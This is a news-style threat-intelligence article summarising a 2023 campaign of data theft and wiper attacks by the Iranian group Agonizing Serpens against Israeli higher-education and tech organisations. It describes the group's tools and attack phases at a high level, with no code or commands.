Iranian APT Group - Agonizing Serpens, Launches Destructive Cyber Attacks on Israeli Higher Education and Tech Sectors

In a series of destructive cyber attacks that began in January 2023, Israeli higher education and tech sectors have fallen victim to a relentless campaign by an Iranian Advanced Persistent Threat (APT) group known as Agonizing Serpens. This campaign, which continued until October, aimed to deploy previously undocumented wiper malware to disrupt and compromise the targeted systems.

Attribution to Agonizing Serpens APT Group

Attributed to Agonizing Serpens, the cyberattacks have also been tracked under different aliases, including Agrius, BlackShadow, and Pink Sandstorm (previously Americium). According to Palo Alto Networks Unit 42, these attacks were characterized by attempts to steal sensitive data, such as personally identifiable information (PII) and intellectual property.

Overview of Attack Methodology

The attackers, after successfully stealing the targeted information, deployed various wipers designed to cover their tracks and render the infected endpoints inoperable. These wipers included MultiLayer, PartialWasher, and BFG Agonizer, along with a custom tool called Sqlextractor, specifically designed to extract information from database servers.

Agonizing Serpens APT Group's History

Agonizing Serpens has been active since at least December 2020 and has previously been linked to wiper attacks targeting Israeli entities. In a May report, a Cybersecurity research firm detailed the group's use of a ransomware strain known as Moneybird in attacks targeting the country.

Detailed Attack Phases

The latest series of attacks involved multiple phases, beginning with the compromise of vulnerable internet-facing web servers to establish initial access. The attackers then deployed web shells, conducted reconnaissance of victim networks, and stole credentials of users with administrative privileges.

A lateral movement phase was followed by data exfiltration, utilizing a combination of public and custom tools, including Sqlextractor, WinSCP, and PuTTY. The final step in the attack chain involved delivering the wiper malware, which included MultiLayer, PartialWasher, and BFG Agonizer.

WinSCP is a popular open-source SFTP and FTP client for secure file transfer between local and remote systems, primarily used in Windows environments.

PuTTY is a free and widely-used terminal emulator and SSH client for remotely accessing and managing network devices and servers in a secure manner, mainly on Windows platforms.

Ongoing Evolution of Agonizing Serpens

Agonizing Serpens continues to evolve and improve its capabilities. To bypass Endpoint Detection and Response (EDR) and other security measures, the group has been regularly rotating between using different known proof-of-concept (PoC) and pentesting tools, as well as developing custom tools. This commitment to innovation and evasion makes Agonizing Serpens a persistent and formidable threat in the realm of cybersecurity.

Endpoint Detection and Response (EDR) is a cybersecurity technology that monitors and responds to security threats at the individual device level, providing real-time visibility, threat detection, and remediation on endpoints, such as computers and mobile devices.

Conclusion

The Agonizing Serpens APT group's relentless cyberattacks on Israeli higher education and tech sectors, coupled with their evolving tactics and advanced tools, highlight the importance of robust cybersecurity measures and proactive threat intelligence to protect against such malicious activities. The ongoing efforts to attribute and counter these threats underscore the critical role of cybersecurity experts and organizations in safeguarding critical infrastructure and sensitive data.